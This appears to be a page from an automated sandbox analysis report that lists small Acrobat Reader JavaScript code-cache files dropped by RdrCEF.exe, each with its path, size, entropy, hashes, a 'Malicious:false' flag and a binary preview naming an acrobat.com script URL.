                                                                                                        SHA-512:F3DF19DA9514FA8092E47997D98AA5D99C4F6EE684BED028E84D48D4F78E7EFA8D34B3D03AA693EDE4F1A9FABAB4FF7E80BA480F1D277BC76A0C05675C6271F0
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......S...9O......_keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/plugin.js ..A..Eo...................................*"Jk........e.....@-H.>a..o..sh.5.A.x..C..A..Eo......W.OM........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4fefb7b48f1589a2_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.396453226496036
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mai//6EYO6LvEwQlRmVNubLku0H6tO2hkmW:W/yeOQKbuvku0a4t
                                                                                                        MD5:D9D949BAE47E103BA2ADEA6344A06911
                                                                                                        SHA1:28E26691342840CDC65675E63F164DFCCAF6E755
                                                                                                        SHA-256:5D714AE1D03A37AD424A52A70207D366D8547484E03C21EA96A26AAF783C6BDC
                                                                                                        SHA-512:784EED670A9CBD4C5FDCA782E744A55BB1DE4DD31CB2F8F141420C5792695B0FCAA94BF829F2365F25A795F99B198AE8F6C036B08F96E2047AB8194EF3722D2A
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....b[....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/1233-chunk.js ..A..Eo...................................*"J............;....(..Wd|....N.b.][A.N....A..Eo.......K..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\54bd97c04db9d043_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.355713237456895
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mafl/VYO6LvEwQlRmVgu0H6tlihtlRsy04x0O/ll:xOQKiu0aytzLkO/ll
                                                                                                        MD5:5C4D7A0BAF6BB4BD8FC502F96A27FF51
                                                                                                        SHA1:F74084DEAC115941CF3FA7503D22AA61CC12BBE5
                                                                                                        SHA-256:3495D5B8E23BBE86FE001C3AB4AD1953514631DF1082A6BB5DBF570CEF8F832A
                                                                                                        SHA-512:D4ED57086344373AAD7EDA03E7D66D217BE3BE085E3B058E54443C4A0C3FC07ED45B491AAF858994FE9D92F2F69003D7737C73992F47C034A3029493FF270F2C
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/6985-chunk.js ..A..Eo...................................*"J..........`.oA.i.l...v...F.....^\p..7....A..Eo......8LQC........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):191
                                                                                                        Entropy (8bit):5.108330957948638
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLNH5kt1llhiIjXUPqf9tsDMaPV44ml05l1:mkl9YOFLvEWsfOLNH6teIAPqVyM+VYlA
                                                                                                        MD5:0AF713C13474DA84FBBEE34B405EAE58
                                                                                                        SHA1:90A0F5BF8F621A952993B6740E116FAED4D6909B
                                                                                                        SHA-256:6FF7083137A278C3A836C3F997B3400629E453C25D10EA05410878BBDFCE4482
                                                                                                        SHA-512:5D2F50F6DB2AE0E76504312C7FD195EFB060796F38E571D377AD790132521CD75EB5513190AA4975727E7CD6F3FCDCE78F025830F5C9A955CE3F0F4299CFE90F
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ..A..Eo...................................*"J.........q.O...j....._y..L^z...?..@N..A..Eo.......e..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):248
                                                                                                        Entropy (8bit):5.308685216031056
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyNH6tditwSeKaT9prVM:URVFAFjVFAFWaLitwSeKaTL
                                                                                                        MD5:9030DEAC9E283405184FF254CF80901F
                                                                                                        SHA1:C1D845875C246F06160726C1FD2AF2366567AD37
                                                                                                        SHA-256:812D37FE3A64B2458E04C764D841BF57E4E8EA64F76CC388CE5461F85D589A31
                                                                                                        SHA-512:EE22618A13D3ED286224056A58039D3A350DF7FBC1D0366445F17A58D07F7651F8336AF9C13C9D5399E61F8D618CB6904A6582B76C177A478109FCB3F4790958
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..A..Eo...................................*"J..............H...{...2../.k`..r4.C. .A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\64766d63a539c3ca_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):216
                                                                                                        Entropy (8bit):5.257795068745495
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lUZHWK8RzYOCGLvHkWBGKuKjXKKINiB4KPEEKPWFvGH5kt1llhJlgF01iwIQx/:m8nYOFLvEWdfNBHYu0H6tAF0kwUcz
                                                                                                        MD5:4A976E4D5EF60F2C314BA0FA9DD63DE4
                                                                                                        SHA1:C6D0110871515CA65141970B2B8E78A0D020E510
                                                                                                        SHA-256:9A2DD1BD8711A5A20C0D7633F5DB1415AD3D3C83A3E7BC6D76C2B9829ADCEFD9
                                                                                                        SHA-512:6E8DF1D768BD6B9FBAFB9E8D7E7EF142FB63BAD8094C44DD1E1579BB35DBCB35D02E8FA7311DD267C6A4F17396EAA4DE2CCA7B6B306C371DD2B38A4DCC654FBA
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......T....."....._keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/selector.js ..A..Eo...................................*"J.............8U-....a=...`#..VT.k......A..Eo........g.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6580eb6b2e190c0b_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):230
                                                                                                        Entropy (8bit):5.326945746283314
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:m7YO6LvEwQlRmV1fOPHku0H6t6EllkPQCRyJjkY:wOQKX2PEu0aIEl44J
                                                                                                        MD5:BE826381CB7CF3C7A723C1F361A66785
                                                                                                        SHA1:C2180D11F3F37456C41480439ABE1B815AE3ECF1
                                                                                                        SHA-256:05109C4CA323B93FC5B1F88EFDBE3A748257B17ACBF9CF1872888795D3E480CE
                                                                                                        SHA-512:FB48ADC8C23A4D42E6E07827023CC88745A190AF87CBDB153632230E3585BC948F65F06FD7915B4F20B9424E0ECA499834A5CE2B08226D717A8683822207C0FF
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......b..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/desktop-verbs-chunk.js ..A..Eo...................................*"J................w....|'rq..h...]......A..Eo.........<........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6a34b53951ee8d83_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):214
                                                                                                        Entropy (8bit):5.202294715444829
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lzS9llC8RzYOCGLvHkWBGKuKTJHrWOmKVEZ9JvVGH5kt1llh0/llGQm0yYIG4r:m0SdYOFLvEWjLH3Yrv0H6t2IGY9
                                                                                                        MD5:DEE98A57FC821FE23E5ED013447B07AF
                                                                                                        SHA1:07F23BE1159E87533043F6A08E9E2B091AD4E7AD
                                                                                                        SHA-256:BBF0D6F3B900FCB370583C3B01136F1D7B3B9BF191AB322FC4878D8C5CE542F1
                                                                                                        SHA-512:D64AD614A29B6B04A909E5E911D0D75F26DFC2D0359A9B4BAA55021308BF05698E5B2E0A646E348D2BBD334650E22F37AEBB12BFC1B1B43A6E9C61F5189451E5
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......R...!p......_keyhttps://rna-resource.acrobat.com/static/js/misc/altDekstopCopyPasteHelper.js ..A..Eo...................................*"J........./.vS}....W1m~.{.$W.U[m..l..<...A..Eo......oj].........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6e8773c5f8211d0f_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208
                                                                                                        Entropy (8bit):5.360252445807587
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mOYO6LvEV5g+VTIaBBH6tY/STEzbDvS2y4:p/5PRIa3anszS2y
                                                                                                        MD5:4585B4B91C7C3E143731723BD836D192
                                                                                                        SHA1:ED76735566A5D6B2B3E0509D2F7CE792ADB4F90E
                                                                                                        SHA-256:E25460B1D43BAF0C9D6D15BB713EFA550A44C5796C33521B75B26624B48772C9
                                                                                                        SHA-512:FA76BB9B5C5248C2BB757890DAA9EED32E0B38DEE5F45D9AC3BC18BA55300788780A8A79C27471F070CCCDC04146E709D3C385AF72D3CBFDC41F8F6C1292EA9A
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......L.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-v3-core.js ..A..Eo...................................*"J............l.>........5..U.. G...y.A..Eo......f#..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215
                                                                                                        Entropy (8bit):5.159458067734524
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lx4F08RzYOCGLvHkWBGKuKjXKGBIEGdevA/KPWFvGH5kt1llhgBl2WyrpYFmYg:ms2VYOFLvEWdvBIEGdeXu0H6tcT251J
                                                                                                        MD5:3DF5C04F57A7AD222CA9BA034BD82A3C
                                                                                                        SHA1:1D56BC181C24F6268F003E4CB30ED935C166ADC9
                                                                                                        SHA-256:D477687AA963771A116D0DF512627F58D41C2470A217D0E5601FC20589018046
                                                                                                        SHA-512:1D2BFD9ECCB5A50D01ACB79148092624DC08CD39C890C5FBC5784D77BB7A5184E7BC600E9892BE7CB324B984CD959210677DEF412EBBCD1AACC7F77BC5602E35
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..A..Eo...................................*"J........A.o]@r..Q.....<w.....].n\....A..Eo......wx.]........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):206
                                                                                                        Entropy (8bit):5.273154351596175
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maVYOFLvEWdwAPCQNH6tUaxm7OhKlvANl:RbR16eazxmJg
                                                                                                        MD5:C85277561120D23023E80EAC74B108E2
                                                                                                        SHA1:841975014AB8410A3515EAF5BD01866EBCEDCC8E
                                                                                                        SHA-256:9058EB0470A4470D1E6D9A0116BC15233D2A215E065DCC619F006B18B4B53896
                                                                                                        SHA-512:4973AA08F8B17C4B52CB93B810B92B87D1F6B26E07616721A975EAB61E8E61E6739096177CFF2C5AA782C1D40E5BB4E27C1CB19B41F8430ECD7EEC5F1149B77F
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..A..Eo...................................*"JR.........4T].....Tw.....(..b...EO....9.A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215
                                                                                                        Entropy (8bit):5.22797806734317
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvGH5kt1llhn53dF5YufMm8:ms2gEYOFLvEWdGQRQVu0H6tddFtU
                                                                                                        MD5:AE2929F84954DDF91713AC4D1B3B6E33
                                                                                                        SHA1:825C373A9C48D8EA7036090E1248676BB7442D3B
                                                                                                        SHA-256:B74B33EEEC1F519074CBDA485C392420084EFBFDDB8724C5B5167A1FB05E8F36
                                                                                                        SHA-512:AB8AEC2C597E174A410D2AE258FB9DFDCAFBD5B55DA9BEBC590D2E9AACCE1A9A11E9DF6865AC6BA68954C31956089F6E6F77A09893F2B481DB457F18377E4ED6
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..A..Eo...................................*"J.......@..{o]...9o|..qY....T....{..u.b..A..Eo......nq.W........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):230
                                                                                                        Entropy (8bit):5.262624061416046
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:m+8nYOFLvEWIAuELZRudyPGVH6tSYGe0KGkTqcY57/:1StuEH2ZagYGggz
                                                                                                        MD5:EC6D542E251AB8E9D3BF402B0762310F
                                                                                                        SHA1:7995597E6F559B7C8873C9B0FF78B54CED7725C2
                                                                                                        SHA-256:309A030D91EF31B6CC4BAD08553AA03574D18333FC6CBD3949D8B8CA6390C837
                                                                                                        SHA-512:B218803E07182D83784BFEFEF3E8B5D8B2716096DD28234B68A188A4657DE09DC7CF3015C5EAEC0BE2A662D08DCEE6BF70B2A4DC490C28E41B72CFC708C1AC9B
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......b.....6....._keyhttps://rna-resource.acrobat.com/static/js/libs/microsoftGraph/microsoft-graph-js-sdk-web.js ..A..Eo...................................*"JS.............-.....5p9o..k#.}..6(..*A...A..Eo.........*........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7409d5bbc5fe3f12_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.274455359896441
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lz+46v8RzYOjGLvHkwIBIXeRmBVZIku0H5kt1llhq19czZb2rVHD0hMmgtl:maHYO6LvEwQlRmVxu0H6tOMFSChn
                                                                                                        MD5:BB0C0076DFD0A5C051BAC01FE701DEDE
                                                                                                        SHA1:0A067547134A895187E35BE080A06FB6820EF6E4
                                                                                                        SHA-256:51925DB59846C91CCE9B0AA8EE738E3E394E7C09D183B0C1F49052CF5E5FEAFB
                                                                                                        SHA-512:DCE91D3825D3087A1F35EEB18A062E3324C43109564FAE1B6DABFF3161534CFC33CFA73377D0BB8D58CF900CDE88B27DE4A2A10663DFF942ECD431D698309ADE
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....p8....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8368-chunk.js ..A..Eo...................................*"J........X.p...}M?p.^_...8pc....r2.....A..Eo.......K..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):217
                                                                                                        Entropy (8bit):5.238943151472341
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l3Umv8RzYOCGLvHkWBGKuKjXKIMcWQAPKfKPWFvGH5kt1llhkHJ+UR/xFzGogJ:mgEYOFLvEWdpJWNKyu0H6tYHwUR/xXj
                                                                                                        MD5:6E5DD9A2316A65F43C32AFC900BA27D6
                                                                                                        SHA1:B0F95B4FB97DB84D6D04A5D18EC6325C12C4D5A8
                                                                                                        SHA-256:0416A253DBEFFCAD838C75E273392CD1B4AAF8A10E2E0373DECE2690F0252C62
                                                                                                        SHA-512:A34B3A59573DD529409D16A36F53393088869EABAAF2D6D716F9DCEBE787A118ACFEE5CDB4158E8748DE3319C4EA5330DDB9056D813B98DC033280325E6DF153
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......U...r.L....._keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/selector.js ..A..Eo...................................*"JY........U......&.Y|.. . .&.............A..Eo......W.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):210
                                                                                                        Entropy (8bit):5.233855490514775
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVGH5kt1llhm/llWREnNWQ1SUmSzl:mzyEYOFLvEWdrIOQNH6tWEREt1S/
                                                                                                        MD5:14C1471FA6E55AF2128994E3CCF696F1
                                                                                                        SHA1:C8A6DA7FA5A23E7EAD8B4826AA5077D0E11A5F62
                                                                                                        SHA-256:8691E2B620E177811CA08206BBB0C0B69326D80175457219C88203206D56F973
                                                                                                        SHA-512:82B6374C45765A8719305B06AAB43630E1A75985A8BE495417DC9979B66BD9ACC0CF0BB4991D81ADE7184446D00681FBF784ABDAB2654D4C3C5B9D318558ADF0
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ..A..Eo...................................*"J.........t\a......x5.'OuE.C..@......x..A..Eo......$.d.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\877d24f4204ec9bf_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.349211778942915
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maePYO6LvEwQlRmVmZtu0H6t0sllE11tLhXS:IOQK4u0ah+Q
                                                                                                        MD5:667B56994CFFCB5B7DEBFB372C3E536A
                                                                                                        SHA1:59DED3A4CF2CD1221AEA02499F8AEB2906CCE25F
                                                                                                        SHA-256:E7593483CC6335D5760370B25CE67C3AB1874E7D081A028F6C9F2E9BF5C0D572
                                                                                                        SHA-512:45AC64DDFD746CC8D41B61C2CA7B95E1776B51DED8384F4B40D2632009083F5A646F11C9001E065352B2AD6EB14772F8E2DE56B83911BEDC866EFD547D558A87
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....a.G...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2882-chunk.js ..A..Eo...................................*"Ju.........?M..v......df..xq..#.+g..wG....A..Eo.......QUz........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\87a0ebc2a54c6f5f_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.394803778638116
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:matbPYO6LvEwQlRmVtTDku0H6tBMLaIda:J1OQK7cu0aH/8a
                                                                                                        MD5:E2FDF85FBA99E4D924A9C089B8530201
                                                                                                        SHA1:A59915FE40D39C93CB1731191C4590F7FEAD3586
                                                                                                        SHA-256:0D6867FC81B7734C968177643AEAF8C6AFD7544FB59016A2C10EFFD2A1876DA2
                                                                                                        SHA-512:3EAF6CC5ECD9FC9057D08D23037C598333B3519A92DB1390B03AD3E35AAA10EF6ED023B3B91540356BA19A5560BED5DF2DE27173349A118B5E549B15C03DD366
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....x......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7467-chunk.js ..A..Eo...................................*"J.........~....Q.^...*.O.N......g}......A..Eo......EKt.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):222
                                                                                                        Entropy (8bit):5.222658157864471
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvGH5kt1llh2HhtlTWlwJNqww6U+55:mnYOFLvEWdhwyu0H6tKHrglwrqwK+4n
                                                                                                        MD5:5BD08E67146D043AE6D5DA50BE033141
                                                                                                        SHA1:37C1A8492C279D0DDAF64FDD55C61F3F4101401E
                                                                                                        SHA-256:9C5A20033058B806B39B53AA848E8D860D4DA45C59310F39639B4E8E4C8E7354
                                                                                                        SHA-512:052186F68510BD4C635C35A52E8D026C0C7A38F26DA028F208AA182FAF41FA84401F8CBB1EE81C13B37EDB164D49959D34A667068D1003B45DE4A4F0D0508C6A
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..A..Eo...................................*"JK..............7...o..a=.98I......(3.$G.A..Eo........9.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):234
                                                                                                        Entropy (8bit):5.237574636557532
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l26Xa8RzYOCGLvHkWBGKuKjXKeRKVIJ/2NAJVKH/KPWFvGH5kt1llhzNLX8ALE:mYXYOFLvEWdrROk/RJbu0H6t+fO44W
                                                                                                        MD5:E97D07395928BA9D27FED95BE018C7AC
                                                                                                        SHA1:38F4871FDF2EA90B7B64FF7253EF70456017EA32
                                                                                                        SHA-256:630A54B136526EEABA0EB771D8AC7F222B040F986513C5933466F7F136257E89
                                                                                                        SHA-512:F9CEA318989042804581F5E3CE2D2681B2D9A52621E27DC75AFD51858C93D46411663FA054E14D5F2566638F6CAEEE21FF67CA8801EF9B5B3F2AA0BEC170FFB6
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..A..Eo...................................*"J..........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):190
                                                                                                        Entropy (8bit):5.171447404874382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVGH5kt1llhjEht+mzoIN1OFPL4m8H5lt/:mmDEYOFLvEWXIGH6tsh8mzV1QPLr+
                                                                                                        MD5:B15177E188CC97DC9687A4A497DCD398
                                                                                                        SHA1:E7620307F128FE8348D319EB668CE6200EA8E0BD
                                                                                                        SHA-256:4C706D9683EFAFC36FB10009862AF15714E3BB560416937418F07C3544EFDC53
                                                                                                        SHA-512:54142FD9DDC13767FF6A7758930422F0E276F2688D9B89DADD23E917322F30EE278E17946C49B725A1EFCB8DBBC3ADA4F15EC5B1E6B32DA63F5D23C66A7DCB90
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..A..Eo...................................*"J.........~]...%s..<...n.f..<.....1#..U..A..Eo.......e..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):211
                                                                                                        Entropy (8bit):5.2367262737636615
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvGH5kt1llhrHztzw8D6EsEJeUmStl:m52YOFLvEWdMAu0H6tqEvsEJ4
                                                                                                        MD5:7E2612B2B9A1A28635BAB159B4A084B9
                                                                                                        SHA1:9A64DAABBC3E48DA7BD68341DF9794E61749987C
                                                                                                        SHA-256:476F936C328C026C7AE10EF32AF6B55A69ACB0B15D6860E365B6B068972B9E40
                                                                                                        SHA-512:F6653369E5696FCB4BC41C642911CD16B907AD75D139E9C9B9FB4CAC58F12EC1201E06E366BF793B8A19CC97286838270943C6E3B3D3BB4239AAE29640E8EE16
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..A..Eo...................................*"J.........z._a...'.v.......4p3..1.']...A..Eo......!d..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):214
                                                                                                        Entropy (8bit):5.227821135447409
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFvGH5kt1llhlT/OTFoDb7T2L:mYilPYOFLvEWd8CAdAu0H6tkRongT
                                                                                                        MD5:5543C5E47CAF10C8BCA7FA5BA26976EC
                                                                                                        SHA1:616B133104E0B972229DE6A6D9F1A68B529CFB0B
                                                                                                        SHA-256:C4D78587A84E3185CD4B770C2AC60AB342E64DEEB1F4831E15DE973F0615F40D
                                                                                                        SHA-512:F87904E88AB8C81A8928355152A22EC5F3FC52CFAE219E4DB660565D960E5C556927C9C4B0780A0FFBF9441D15E95FE3C375271862A1C56F31AB3C2480C3573C
                                                                                                        Malicious:false
